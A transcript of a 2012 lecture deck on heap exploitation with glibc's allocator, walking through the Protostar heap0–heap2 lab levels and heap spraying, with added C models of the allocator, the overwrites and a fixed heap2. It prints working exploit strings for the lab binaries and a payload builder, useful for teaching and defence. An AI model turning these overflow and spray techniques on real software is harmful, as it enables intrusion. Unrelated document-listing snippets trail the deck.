HEAP BASED EXPLOITATION. Scott Hand CSG 2/22/12


2 WHAT WE WILL COVER
- Heap Basics
- Overview of Exercise Environment
- Protostar: Heap0, Heap1, Heap2, Heap3
- Heap Spraying
- Conclusion

3 BASICS Heap Background and Theory

4 WHAT IS THE HEAP?
We know about the stack: programs store local variables there.
The heap is for dynamically allocated storage: objects whose size or lifetime is not known at compile time (malloc/free), and data too large for the stack. Globals do not live on the heap; they go in .data or .bss.
In Linux, a process image looks like this, from low to high addresses:
- .data: initialized globals
- .bss: uninitialized globals
- Heap: dynamically allocated space, grows upwards
- Stack: local variables, grows down

5 MEMORY ALLOCATION DATA STRUCTURES
- glibc uses ptmalloc2, a version of Doug Lea's popular dlmalloc algorithm. (Protostar is 32-bit; the sizes below are for that case.)
- Memory is handed out in chunks. Each chunk is 8-byte aligned and consists of a header followed by the user data that malloc() returns a pointer to.
- Each chunk's header holds its own size, and the low bit of the size field (PREV_INUSE) says whether the chunk before it is in use. The size of a free chunk is also written at its end (the prev_size field of the following chunk), so free neighbours can be found and combined in either direction. That trailer is only valid while the chunk is free: for an in-use chunk those bytes are given to the user as data.
- Free chunks are kept in bins, linked lists sorted by size: for sizes under 512 there is one bin per size in steps of 8; over 512 a bin covers a range of sizes, each a multiple of 8.
- Upon freeing a chunk it is combined with free neighbours to lower fragmentation, with one exception that matters later: small chunks (roughly 64 bytes and under) go to the fastbins and are not combined.
- The final top chunk is the unused remainder; its size field records the amount of free space left.

6 BINNING
[Figure: a row of bins labelled by chunk size (16, 24, 32, ..., 512, 576, ... up to 2^31), with free chunks 1 to 5 hanging off the bin for their size.]

7 SOME CONSEQUENCES
- Locality preservation: chunks allocated at the same time tend to be referenced together and to have overlapping lifetimes. Keeping them close is important for good performance (fewer cache misses).
- The allocator uses best-fit with a preference for recently freed chunks and for carving new chunks off the top chunk, so consecutive allocations end up in consecutive blocks when there is space.
- This is good for us: it makes overflows easy to aim, because the memory allocated right after a vulnerable buffer is often given to other variables, which may hold things such as function pointers or file paths.

8 MALLOC EXAMPLE
We want to see what the heap looks like as more memory is allocated. We will allocate three strings a, b, c of 32 bytes each. (A 32-byte request becomes a 40-byte chunk, 0x28, once the 4-byte size field is added and the total is rounded up to a multiple of 8; with the PREV_INUSE bit set the size field reads 0x29.)
Code:
    char *a, *b, *c;
    a = malloc(32);
    b = malloc(32);
    c = malloc(32);
This will serve as an introduction to the heap3 problem.

9 FIRST ALLOCATION
    0x0804c000  chunk 1 (a): 8-byte header, size field 0x29
    0x0804c008  32 bytes of data (a)
    top chunk size field (remaining space): 0xFD9
(0xFD9 is 0xFD8 with the PREV_INUSE bit set: the 0x1000-byte arena minus the 0x28 bytes just taken. Each further allocation subtracts another 0x28.)

10 SECOND ALLOCATION
    0x0804c000  chunk 1 (a): 8-byte header, size field 0x29
    0x0804c008  32 bytes of data (a)
    0x0804c028  chunk 2 (b): 8-byte header, size field 0x29
    0x0804c030  32 bytes of data (b)
    top chunk size field (remaining space): 0xFB1

11 THIRD ALLOCATION
    0x0804c000  chunk 1 (a): 8-byte header, size field 0x29
    0x0804c008  32 bytes of data (a)
    0x0804c028  chunk 2 (b): 8-byte header, size field 0x29
    0x0804c030  32 bytes of data (b)
    0x0804c050  chunk 3 (c): 8-byte header, size field 0x29
    0x0804c058  32 bytes of data (c)
    top chunk size field (remaining space): 0xF89

12 FREE EXAMPLE
Now the interesting (and exploitable) part: the free() implementation in dlmalloc. Let's examine the contents of memory after successive free() calls are executed.
Code:
    free(c);
    free(b);
    free(a);

13 BEFORE FIRST FREE
    0x0804c000  chunk 1, size field 0x29    0x0804c008  "AAAA\0"      (a)
    0x0804c028  chunk 2, size field 0x29    0x0804c030  "BBBB\0"      (b)
    0x0804c050  chunk 3, size field 0x29    0x0804c058  "CCCC\0"      (c)
    remaining space: 0xF89

14 AFTER FIRST FREE: free(c)
    0x0804c000  chunk 1, size field 0x29    0x0804c008  "AAAA\0"      (a)
    0x0804c028  chunk 2, size field 0x29    0x0804c030  "BBBB\0"      (b)
    0x0804c050  chunk 3, size field 0x29    0x0804c058  \0 * 32       (free: fd = NULL overwrote "CCCC")
    remaining space: 0xF89

15 AFTER SECOND FREE: free(b)
    0x0804c000  chunk 1, size field 0x29    0x0804c008  "AAAA\0"      (a)
    0x0804c028  chunk 2, size field 0x29    0x0804c030  0x0804c050    (free: fd -> chunk 3)
    0x0804c050  chunk 3, size field 0x29    0x0804c058  \0 * 32       (free: fd = NULL)
    remaining space: 0xF89

16 AFTER THIRD FREE: free(a)
    0x0804c000  chunk 1, size field 0x29    0x0804c008  0x0804c028    (free: fd -> chunk 2)
    0x0804c028  chunk 2, size field 0x29    0x0804c030  0x0804c050    (free: fd -> chunk 3)
    0x0804c050  chunk 3, size field 0x29    0x0804c058  \0 * 32       (free: fd = NULL)
    remaining space: 0xF89
Note that the size fields and the remaining space never change: nothing was combined. Each free() only wrote one pointer into the first 4 bytes of the chunk's data, and the most recently freed chunk is at the head of the resulting list.

17 LOOKING AT MALLOC.C
Here's the chunk structure; the parts we care about are prev_size, size and fd:
    struct malloc_chunk {
      INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
      INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
      struct malloc_chunk* fd;         /* double links -- used only if free. */
      struct malloc_chunk* bk;
      /* Only for large blocks: pointer to next larger size. */
      struct malloc_chunk* fd_nextsize;
      struct malloc_chunk* bk_nextsize;
    };

18 SOME OBSERVATIONS
- Looks like this machine uses singly linked lists rather than doubly linked lists: only fd was written, bk was never touched. The reason is the chunk size: 0x28-byte chunks are small enough for the fastbins, and fastbins are singly linked LIFO lists threaded through fd only (which is also why the freed chunks were not combined and the top chunk's size never changed).
- fd points at the chunk header (0x0804c028), not at the user data (0x0804c030), and it occupies the first 4 bytes of what used to be user data.
- For these chunks we only have the size and fd values to modify.
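To make the dumps on slides 9 to 16 reproducible without the Protostar VM, here is an added example (not code from the slides, and not glibc's allocator): a small C model of the chunk layout they show, with a 32-bit arena at 0x0804c000 kept in a byte array. It carves 0x28-byte chunks off a top chunk, tags sizes with PREV_INUSE, and on free() pushes the chunk onto a singly linked LIFO list through fd without coalescing, which is what the fd-only behaviour observed above amounts to. The base address and the 4 KiB arena size are chosen so the numbers match the slides (0x29, 0xFD9, 0xFB1, 0xF89); the names toy_malloc, toy_free and the helpers are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the chunk layout on slides 8-18: a 4 KiB 32-bit arena
 * at 0x0804c000 (the slides' base) inside a byte array. Each chunk is
 * [prev_size][size | PREV_INUSE][user data...]; freed chunks go on a singly
 * linked LIFO list threaded through the first user word (fd) and are not
 * merged with their neighbours. Teaching model only, not glibc's code. */

#define ARENA_BASE 0x0804c000u
#define ARENA_SIZE 0x1000u
#define PREV_INUSE 1u
#define HDR        8u          /* prev_size + size, 4 bytes each on 32-bit */

static uint8_t  arena[ARENA_SIZE];
static uint32_t top_off;       /* arena offset of the top chunk */
static uint32_t fastbin_head;  /* chunk address of the most recently freed chunk, 0 if none */

static uint32_t rd32(uint32_t addr)
{
    uint32_t v;
    memcpy(&v, arena + (addr - ARENA_BASE), 4);
    return v;
}

static void wr32(uint32_t addr, uint32_t v)
{
    memcpy(arena + (addr - ARENA_BASE), &v, 4);
}

/* request + 4-byte size field, rounded up to a multiple of 8; 32 -> 0x28 */
static uint32_t chunk_size(uint32_t request)
{
    uint32_t s = (request + 4u + 7u) & ~7u;
    return s < 16u ? 16u : s;
}

void heap_init(void)
{
    memset(arena, 0, sizeof arena);
    top_off = 0;
    fastbin_head = 0;
    wr32(ARENA_BASE + 4u, ARENA_SIZE | PREV_INUSE);   /* the whole arena is the top chunk */
}

/* Returns the user pointer (chunk address + header), 0 when out of space. */
uint32_t toy_malloc(uint32_t request)
{
    uint32_t sz = chunk_size(request);
    if (fastbin_head && (rd32(fastbin_head + 4u) & ~7u) == sz) {
        uint32_t c = fastbin_head;
        fastbin_head = rd32(c + HDR);            /* pop: head = head->fd */
        return c + HDR;
    }
    uint32_t c = ARENA_BASE + top_off;
    uint32_t top_size = rd32(c + 4u) & ~7u;
    if (sz > top_size)
        return 0;
    wr32(c + 4u, sz | PREV_INUSE);               /* carve the chunk off the top */
    top_off += sz;
    wr32(ARENA_BASE + top_off + 4u, (top_size - sz) | PREV_INUSE);  /* shrink the top chunk */
    return c + HDR;
}

/* Push onto the LIFO list: fd is written over the first 4 bytes of user data. */
void toy_free(uint32_t p)
{
    wr32(p, fastbin_head);
    fastbin_head = p - HDR;
}

void     toy_strcpy(uint32_t p, const char *s) { strcpy((char *)arena + (p - ARENA_BASE), s); }
uint32_t size_field(uint32_t p)  { return rd32(p - 4u); }    /* the 0x29 on the slides */
uint32_t fd_of(uint32_t p)       { return rd32(p); }         /* first user word */
uint32_t top_size_field(void)    { return rd32(ARENA_BASE + top_off + 4u); }

int main(void)
{
    heap_init();
    uint32_t a = toy_malloc(32), b = toy_malloc(32), c = toy_malloc(32);
    toy_strcpy(a, "AAAA"); toy_strcpy(b, "BBBB"); toy_strcpy(c, "CCCC");
    printf("a=%#x b=%#x c=%#x size=%#x top=%#x\n", a, b, c, size_field(a), top_size_field());
    toy_free(c); toy_free(b); toy_free(a);
    printf("after frees: a.fd=%#x b.fd=%#x c.fd=%#x top=%#x\n",
           fd_of(a), fd_of(b), fd_of(c), top_size_field());
    return 0;
}
```

Compile with gcc -std=c99 and run: the printed addresses and fd values are the ones on slides 9 to 16, and calling toy_malloc(32) again after the three frees hands back a (0x0804c008) first, then b, the LIFO reuse that heap exploits rely on when they want a freshly freed chunk to be handed to the next allocation.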

19 EXPLOIT-EXERCISES.COM
3 Virtual Machines with Challenges:
- Nebula: basic exploitation for people with no experience
- Protostar: lots of real-world exploits without some of the modern exploit mitigation systems
- Fusion: advanced scenarios and modern protection systems. Good for those who want to learn how to bypass those systems.
We will use Protostar. It has 4 heap-based exploitation challenges.

20 HEAP CHALLENGES
- Heap0: basic heap overflow
- Heap1: more complicated overflow
- Heap2: stale pointers
- Heap3: heap metadata manipulation

21 HEAP0 Basic Overflow

22 HEAP0 - OVERVIEW
Goal: change the function pointer that points to nowinner() so that it points to winner() instead.
Description from author: "This level introduces heap overflows and how they can influence code flow."

23 HEAP0 - CODE
Relevant code:
    struct data *d;
    struct fp *f;

    d = malloc(sizeof(struct data));
    f = malloc(sizeof(struct fp));
    f->fp = nowinner;

    printf("data is at %p, fp is at %p\n", d, f);

    strcpy(d->name, argv[1]);   /* unbounded copy into d->name */
    f->fp();

24 HEAP0 VALID INPUT BEFORE STRCPY
[Figure: hex dump of the two chunks, d's name buffer followed by f, with f->fp holding the address of nowinner().]

25 HEAP0 VALID INPUT AFTER STRCPY
[Figure: the same dump after strcpy(d->name, "AAAA"): "AAAA" at the start of d's buffer, f->fp still nowinner().]

26 HEAP0 EXPLOIT CREATION
If we overflow the character buffer in d, we can overwrite the function pointer in f.
The distance from d to f is 0x804a050 - 0x804a008 = 72 (the 64-byte name buffer plus the 8-byte header of f's chunk), taken from the addresses the program prints.
The address of winner() is 0x08048464 (fixed, since the binary is not position independent).
Python (2) code:
    print "A"*72 + "\x64\x84\x04\x08"
The address is written little-endian. It contains no 0x00 byte, which matters because strcpy() stops at the first NUL.

27 HEAP0 INVALID INPUT AFTER STRCPY
[Figure: the dump after the exploit string: 72 bytes of "A" run from d's buffer through f's chunk header, and f->fp now holds the address of winner().]

28 HEAP1 Tougher Overflow

29 HEAP1 - OVERVIEW
Goal: execute the winner() function again. But it's not so obvious how this will happen: there are two struct allocations (each with its own malloc'd name buffer) and two strcpy calls, and there are no function pointers. What should we overwrite?
Description from author: "This level takes a look at code flow hijacking in data overwrite cases."

30 HEAP1 CODE
Relevant code (struct internet holds an int priority followed by a char *name):
    struct internet *i1, *i2, *i3;

    i1 = malloc(sizeof(struct internet));
    i1->priority = 1;
    i1->name = malloc(8);

    i2 = malloc(sizeof(struct internet));
    i2->priority = 2;
    i2->name = malloc(8);

    strcpy(i1->name, argv[1]);   /* unbounded: overflows past the 8-byte buffer */
    strcpy(i2->name, argv[2]);   /* writes wherever i2->name points by now */

31 HEAP1 EXPLOIT IDEAS
This instruction is the important one:
    strcpy(i2->name, argv[2]);
It copies an argument to wherever the pointer stored in i2->name points, and that pointer lives on the heap, right after the 8-byte buffer that i1->name points to. Can we change the destination of our argument?

32 HEAP1 VALID INPUT BEFORE STRCPY
[Figure: hex dump of the four chunks in order: i1, i1->name's buffer, i2, i2->name's buffer, with each name pointer pointing at its own buffer.]

33 HEAP1 VALID INPUT AFTER STRCPY
[Figure: the same dump after the two copies: i1->name = "AAAA", i2->name = "BBBB", pointers unchanged.]

34 HEAP1 EXPLOIT CREATION
Let's overflow i1->name to overwrite the i2->name pointer. Where should it point? At the saved return address! Then the second strcpy() writes our bytes there.
- 20 characters of padding (the 8-byte name buffer, the 8-byte header of i2's chunk, and i2's 4-byte priority field), then the pointer.
- The return address is stored at 0xbffff79c (stack addresses are fixed because the Protostar VM runs without ASLR).
- The address of winner() is 0x08048494.
Python (2) code for the overflow (argv[1], copied into i1->name):
    print "A"*20 + "\x9c\xf7\xff\xbf"
Shell code for the replacement (argv[2], copied to wherever i2->name now points):
    printf "\x94\x84\x04\x08"
Final exploit (the two arguments to heap1):
    `python -c 'print "A"*20 + "\x9c\xf7\xff\xbf"'` `printf "\x94\x84\x04\x08"`
After the second strcpy() the program prints its closing message and returns from main() into winner().
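The heap0 and heap1 payloads above are built by hand from printed addresses. Here is an added example (not from the slides or from Protostar) in C: a payload builder for both overwrites, plus a byte-array model of the heap slice so the effect of strcpy() can be checked offline. It uses the slide's heap0 addresses (d->name at 0x0804a008, f->fp at 0x0804a050, winner() at 0x08048464) and the heap1 stack and winner() addresses (0xbffff79c, 0x08048494). The heap1 heap addresses (i1->name at 0x0804a018, the i2->name pointer at 0x0804a02c) and the nowinner() address (0x08048478) are assumptions, picked to match the 20-byte padding on the slide. The check it adds, which the slides do not spell out, is that no byte of the address may be 0x00, since strcpy() stops at the first NUL.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the heap0/heap1 overwrites. heap0 addresses and both
 * winner() addresses are from the slides; the heap1 heap addresses and the
 * nowinner() address are assumed. `mem` stands in for a slice of the heap. */

#define MEM_BASE 0x0804a000u
#define MEM_SIZE 0x100u
static uint8_t mem[MEM_SIZE];

static uint32_t ld32(uint32_t addr) { uint32_t v; memcpy(&v, mem + (addr - MEM_BASE), 4); return v; }
static void     st32(uint32_t addr, uint32_t v) { memcpy(mem + (addr - MEM_BASE), &v, 4); }

/* Little-endian encoding, the same bytes Python's "\x64\x84\x04\x08" spells. */
static void p32(uint32_t v, uint8_t out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

/* strcpy() copies through the first NUL, so a 0x00 byte inside the address
 * truncates the overwrite. Returns 1 if all four bytes are non-zero. */
int address_is_strcpy_safe(uint32_t v)
{
    uint8_t le[4];
    p32(v, le);
    return le[0] && le[1] && le[2] && le[3];
}

/* Build "A" * (target - buf) + p32(value) as a C string. Returns the payload
 * length without the terminator, or -1 if strcpy() could not deliver it. */
int build_overwrite(uint32_t buf_addr, uint32_t target_addr, uint32_t value,
                    uint8_t *out, size_t cap)
{
    if (target_addr < buf_addr || !address_is_strcpy_safe(value))
        return -1;
    size_t pad = target_addr - buf_addr;
    if (pad + 4 + 1 > cap)
        return -1;
    memset(out, 'A', pad);
    p32(value, out + pad);
    out[pad + 4] = 0;            /* strcpy also writes this NUL one byte past the target */
    return (int)(pad + 4);
}

/* strcpy() semantics onto the model memory; refuses to run past the slice. */
static int sim_strcpy(uint32_t dst, const uint8_t *src)
{
    size_t off = dst - MEM_BASE, i = 0;
    do {
        if (off + i >= MEM_SIZE) return -1;
        mem[off + i] = src[i];
    } while (src[i++] != 0);
    return 0;
}

/* heap0: overflow d->name into f->fp; returns the function pointer afterwards. */
uint32_t heap0_demo(void)
{
    uint8_t payload[128];
    memset(mem, 0, sizeof mem);
    st32(0x0804a050u, 0x08048478u);               /* f->fp = nowinner (assumed address) */
    int n = build_overwrite(0x0804a008u, 0x0804a050u, 0x08048464u, payload, sizeof payload);
    if (n != 72 + 4 || sim_strcpy(0x0804a008u, payload) != 0)
        return 0;
    return ld32(0x0804a050u);                      /* now 0x08048464 = winner() */
}

/* heap1 stage 1: overflow i1->name into the i2->name pointer; returns the pointer. */
uint32_t heap1_stage1(void)
{
    uint8_t payload[64];
    memset(mem, 0, sizeof mem);
    st32(0x0804a02cu, 0x0804a038u);               /* i2->name -> its own 8-byte buffer (assumed) */
    int n = build_overwrite(0x0804a018u, 0x0804a02cu, 0xbffff79cu, payload, sizeof payload);
    if (n != 20 + 4 || sim_strcpy(0x0804a018u, payload) != 0)
        return 0;
    return ld32(0x0804a02cu);                      /* now 0xbffff79c = saved return address */
}

/* heap1 stage 2: argv[2] is just winner()'s address; strcpy(i2->name, argv[2])
 * writes it wherever stage 1 pointed. Returns its length (4) or -1. */
int heap1_stage2(uint8_t out[5])
{
    uint32_t where = 0xbffff79cu;
    return build_overwrite(where, where, 0x08048494u, out, 5);
}

int main(void)
{
    uint8_t argv2[5];
    printf("heap0: f->fp = %#x\n", heap0_demo());
    printf("heap1: i2->name = %#x, argv[2] is %d bytes\n", heap1_stage1(), heap1_stage2(argv2));
    printf("0x08048400 deliverable by strcpy? %d\n", address_is_strcpy_safe(0x08048400u));
    return 0;
}
```

The model has no allocator in it, so the "A"s that land on i2's chunk header go unnoticed, just as they do in the real level, where nothing is freed after the overflow. The NUL that strcpy() appends after the address is the reason a target that sits at the very end of a chunk needs a look at what the next byte is.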

35 HEAP2 Stale Pointers

36 HEAP2 - OVERVIEW
Goal: according to the problem description, this level is completed when you see the "you have logged in already!" message.
Description from author: "This level examines what can happen when heap pointers are stale."

37 HEAP2 PROGRAM DESCRIPTION
For each input loop, the following commands are parsed:
auth
  Description: allocates memory for the auth pointer, clears it, then copies the user input into it.
  Code:
      auth = malloc(sizeof(auth));
      memset(auth, 0, sizeof(auth));
      if(strlen(line + 5) < 31) {
          strcpy(auth->name, line + 5);
      }
service
  Description: changes the service pointer to a duplicate of the provided input.
  Code:
      service = strdup(line + 7);

38 HEAP2 PROGRAM DESCRIPTION (continued)
reset
  Description: frees the auth pointer (without clearing it, so auth is stale afterwards).
  Code:
      free(auth);
login
  Description: simulates a login. If the auth->auth field is nonzero, the user is logged in. Otherwise, we get a dummy password prompt.
  Code:
      if(auth->auth) {
          printf("you have logged in already!\n");
      } else {
          printf("please enter your password\n");
      }

39 HEAP2 VULNERABILITY
This program calls malloc() for auth using sizeof(auth). Since auth is a struct auth *, sizeof(auth) is 4, the size of the pointer, not the size of the struct (a 32-byte name followed by the int auth). So only the smallest possible chunk is allocated, yet auth->auth is still read 32 bytes past the start of the allocation, well beyond its 4 bytes and inside whatever chunk was placed next.

40 HEAP2 EXPLOIT
- Call auth CSG to set up our auth pointer (a tiny chunk).
- Then call service with a bunch of non-zero garbage; strdup() places it in the chunk right after auth's.
- Now auth->auth, 32 bytes past the start of auth's 4-byte allocation, reads from inside service's buffer and sees a non-zero integer.
Python (2) exploit (feed its output to heap2's stdin):
    print "auth CSG\nservice " + "A"*16 + "\nlogin"

41 HEAP2 EXPLOIT VISUALIZED
What the programmer thinks happened:
    0x804c000  auth chunk size
    0x804c008  auth->name
    0x804c028  auth->auth
    0x804c030  service chunk size
    0x804c038  service data
What actually happened:
    0x804c000  auth chunk size
    0x804c008  auth->name (a 4-byte allocation)
    0x804c018  service chunk size
    0x804c020  service data
    0x804c028  auth->auth, now inside service's data, and non-zero
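What the fix looks like is worth seeing next to the bug. Here is an added example, not heap2's source: the command loop rewritten in C with the two changes a review would demand, sizeof *auth (the struct) instead of sizeof auth (the pointer) so auth->auth lies inside the allocation, and NULLing the pointer after free() with a check before use so that "login" after "reset" cannot read a stale chunk. The session struct, handle_line() and run_script() are mine, and the script strings are constructed here, not captured from the VM.

```c
#define _POSIX_C_SOURCE 200809L   /* strdup, strtok_r */
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example: heap2's command handler with two fixes. Fix 1: allocate
 * sizeof *auth (the struct), not sizeof auth (the pointer). Fix 2: NULL the
 * pointer after free() and refuse to use it afterwards. */

struct auth {
    char name[32];
    int  auth;
};

struct session {
    struct auth *auth;
    char        *service;
};

/* What the vulnerable program allocates: the size of a pointer. */
size_t vulnerable_alloc_size(void) { struct auth *auth = NULL; return sizeof auth; }
/* What it needed: the whole struct, which is what handle_line() uses. */
size_t fixed_alloc_size(void)      { return sizeof(struct auth); }
/* Where "login" reads; with the vulnerable size this is out of bounds. */
size_t auth_field_offset(void)     { return offsetof(struct auth, auth); }

/* Returns 1 = logged in, 0 = password prompt, -1 = no auth record, -2 = unknown line. */
int handle_line(struct session *s, const char *line)
{
    if (strncmp(line, "auth ", 5) == 0) {
        free(s->auth);                                  /* the original leaked the old record */
        s->auth = calloc(1, sizeof *s->auth);           /* fix 1: the whole struct, zeroed */
        if (s->auth == NULL)
            return -1;
        if (strlen(line + 5) < sizeof s->auth->name)    /* bounded, like the original's < 31 */
            strcpy(s->auth->name, line + 5);
        return 0;
    }
    if (strncmp(line, "reset", 5) == 0) {
        free(s->auth);
        s->auth = NULL;                                 /* fix 2: no stale pointer */
        return 0;
    }
    if (strncmp(line, "service", 7) == 0) {
        free(s->service);
        s->service = strdup(line + 7);
        return 0;
    }
    if (strncmp(line, "login", 5) == 0) {
        if (s->auth == NULL)                            /* fix 2: stale use rejected */
            return -1;
        return s->auth->auth != 0;
    }
    return -2;
}

/* Feeds a newline-separated script to handle_line(); returns the result of
 * the last "login" line, or -2 if the script never logs in. */
int run_script(const char *script)
{
    struct session s = { NULL, NULL };
    char *copy = strdup(script), *save = NULL, *line;
    int result = -2;
    if (copy == NULL)
        return -2;
    for (line = strtok_r(copy, "\n", &save); line; line = strtok_r(NULL, "\n", &save)) {
        int r = handle_line(&s, line);
        if (strncmp(line, "login", 5) == 0)
            result = r;
    }
    free(copy);
    free(s.auth);
    free(s.service);
    return result;
}

int main(void)
{
    printf("vulnerable malloc size %zu, needed %zu, auth field at offset %zu\n",
           vulnerable_alloc_size(), fixed_alloc_size(), auth_field_offset());
    printf("slide exploit against fixed code: login = %d\n",
           run_script("auth CSG\nservice AAAAAAAAAAAAAAAA\nlogin"));
    printf("login after reset: %d\n", run_script("auth CSG\nreset\nlogin"));
    return 0;
}
```

Run against the slide's script the fixed loop answers 0 (password prompt), because auth->auth now lives inside a zeroed 36-byte struct rather than 32 bytes past a 4-byte chunk; "login" after "reset" answers -1 instead of dereferencing freed memory. Compilers do not warn about sizeof(pointer) passed to malloc, so the sizeof *p spelling, which cannot be wrong about the type, is the habit to adopt.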

42 HEAP3 Metadata Corruption

43 HEAP3 OVERVIEW
Try this one on your own. We'll go over the solution next week.

44 HEAP SPRAYING More Heap Abuse

45 HEAP SPRAYING
- The allocator's tendency towards contiguous chunk placement can be used for evil yet again.
- In browser, PDF, Flash, etc. exploitation, where the attacker controls memory allocations (usually via a scripting language such as JavaScript), the payload is usually placed on the heap.
- How do we reliably find our payload in a potentially fragmented heap? Fill a large block with a NOP sled followed by the payload and allocate copies of it repeatedly ("spray" it) into the heap.
- Once the allocator has filled the gaps left by fragmentation, the copies occupy a big contiguous address range: jumping to almost any address in it lands in a sled and slides into the payload.
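To see why the sled matters, here is an added example, not from the slides or the linked tutorial: a C model of the spray, standing in for what a JavaScript spray does in a browser heap. A contiguous region is filled with identical blocks of sled plus payload, and land() does what the CPU does when control arrives at an arbitrary offset: it executes NOPs until the first non-NOP byte. The region size, block size and the 4-byte marker standing in for the payload are constructed here; chunk headers that a real allocator puts between blocks are ignored.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of a heap spray. A contiguous region stands in for the
 * sprayed part of the heap; each block is a NOP sled (0x90) followed by a
 * marker that stands in for the payload. Not code from any real exploit. */

#define NOP 0x90u

/* Fills the region with [sled | payload] blocks; returns how many were written. */
size_t spray(uint8_t *region, size_t region_len, size_t block_len,
             const uint8_t *payload, size_t payload_len)
{
    size_t n = 0;
    if (payload_len == 0 || payload_len > block_len)
        return 0;
    for (size_t off = 0; off + block_len <= region_len; off += block_len, n++) {
        memset(region + off, NOP, block_len - payload_len);
        memcpy(region + off + block_len - payload_len, payload, payload_len);
    }
    return n;
}

/* Slides from `offset` over NOPs. Returns the offset where execution leaves
 * the sled, or -1 if the sled runs into the end of the region. */
long land(const uint8_t *region, size_t region_len, size_t offset)
{
    while (offset < region_len && region[offset] == NOP)
        offset++;
    return offset < region_len ? (long)offset : -1;
}

/* A landing is clean only if it stops exactly at a payload start; landing in
 * the middle of a payload executes it from the wrong instruction. */
int lands_cleanly(const uint8_t *region, size_t region_len, size_t block_len,
                  size_t payload_len, size_t offset)
{
    long stop = land(region, region_len, offset);
    return stop >= 0 && (size_t)stop % block_len == block_len - payload_len;
}

/* Counts the offsets in the region from which a jump lands cleanly. */
size_t clean_offsets(const uint8_t *region, size_t region_len, size_t block_len, size_t payload_len)
{
    size_t count = 0;
    for (size_t off = 0; off < region_len; off++)
        count += lands_cleanly(region, region_len, block_len, payload_len, off) != 0;
    return count;
}

/* Spray 16 KiB in 4 KiB blocks with a 4-byte marker. Every sled byte and the
 * payload's first byte land cleanly: 4093 offsets per block, 16372 in all. */
size_t demo_count(void)
{
    static const uint8_t marker[4] = { 0xcc, 0xcc, 0xcc, 0xcc };   /* must not contain 0x90 */
    enum { REGION = 16 * 1024, BLOCK = 4096 };
    uint8_t *region = malloc(REGION);
    if (region == NULL)
        return 0;
    size_t blocks = spray(region, REGION, BLOCK, marker, sizeof marker);
    size_t clean = blocks ? clean_offsets(region, REGION, BLOCK, sizeof marker) : 0;
    free(region);
    return clean;
}

int main(void)
{
    size_t clean = demo_count();
    printf("%zu of %d offsets land on the payload (%.2f%%)\n",
           clean, 16 * 1024, 100.0 * clean / (16 * 1024));
    return 0;
}
```

The count says the thing the slide states in words: with a 4-byte payload at the end of each 4 KiB block, all but three offsets per block reach the payload entry, and the odds only get worse as the payload grows relative to the block, which is why real sprays use large blocks and keep the payload at the tail. The model also shows the one constraint on the payload bytes: anything that looks like a NOP to land() would make the sled run on into it.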

46 CONCLUSION

47 CONCLUSION
Links:
- https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
Any questions?


More information

Web application security: automated scanning versus manual penetration testing.

Web application security: automated scanning versus manual penetration testing. Web application security White paper January 2008 Web application security: automated scanning versus manual penetration testing. Danny Allan, strategic research analyst, IBM Software Group Page 2 Contents

More information

CommonSpot Content Server Version 6.2 Release Notes

CommonSpot Content Server Version 6.2 Release Notes CommonSpot Content Server Version 6.2 Release Notes Copyright 1998-2011 PaperThin, Inc. All rights reserved. About this Document CommonSpot version 6.2 updates the recent 6.1 release with: Enhancements

More information

Network Security Algorithms

Network Security Algorithms Network Security Algorithms Thomas Zink University of Konstanz thomas.zink@uni-konstanz.de Abstract. Viruses, Worms and Trojan Horses, the malware zoo is growing every day. Hackers and Crackers try to

More information

6. Storage and File Structures

6. Storage and File Structures ECS-165A WQ 11 110 6. Storage and File Structures Goals Understand the basic concepts underlying different storage media, buffer management, files structures, and organization of records in files. Contents

More information

Attacking the TCP Reassembly Plane of Network Forensics Tools

Attacking the TCP Reassembly Plane of Network Forensics Tools Attacking the TCP Reassembly Plane of Network Forensics Tools Gérard 12 Thomas Engel 1 1 University of Luxembourg - SECAN LAB 2 SES ASTRA Outline Introduction Definitions and terminology A PCAP file contains

More information

Leak Check Version 2.1 for Linux TM

Leak Check Version 2.1 for Linux TM Leak Check Version 2.1 for Linux TM User s Guide Including Leak Analyzer For x86 Servers Document Number DLC20-L-021-1 Copyright 2003-2009 Dynamic Memory Solutions LLC www.dynamic-memory.com Notices Information

More information

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange

More information

7.1 Our Current Model

7.1 Our Current Model Chapter 7 The Stack In this chapter we examine what is arguably the most important abstract data type in computer science, the stack. We will see that the stack ADT and its implementation are very simple.

More information

MUSCLE Cryptographic Card Edge Definition for Java 1 Enabled Smartcards

MUSCLE Cryptographic Card Edge Definition for Java 1 Enabled Smartcards MUSCLE Cryptographic Card Edge Definition for Java 1 Enabled Smartcards David Corcoran Tommaso Cucinotta This document is provided on an as-is basis. Neither the authors nor the MUSCLE project are responsible

More information

Application. Application Layer Security. Protocols. Some Essentials. Attacking the Application Layer. SQL Injection

Application. Application Layer Security. Protocols. Some Essentials. Attacking the Application Layer. SQL Injection Application Layer Security Application Presentation Session TCP UDP IP Data Link Physical Protocols File Transfer Protocol (FTP) Telnet Simple Mail Transfer Protocol (SMTP) Hypertext Transfer Protocol

More information

VISUAL GUIDE to. RX Scripting. for Roulette Xtreme - System Designer 2.0

VISUAL GUIDE to. RX Scripting. for Roulette Xtreme - System Designer 2.0 VISUAL GUIDE to RX Scripting for Roulette Xtreme - System Designer 2.0 UX Software - 2009 TABLE OF CONTENTS INTRODUCTION... ii What is this book about?... iii How to use this book... iii Time to start...

More information

NAND Flash Memories. Understanding NAND Flash Factory Pre-Programming. Schemes

NAND Flash Memories. Understanding NAND Flash Factory Pre-Programming. Schemes NAND Flash Memories Understanding NAND Flash Factory Pre-Programming Schemes Application Note February 2009 an_elnec_nand_schemes, version 1.00 Version 1.00/02.2009 Page 1 of 20 NAND flash technology enables

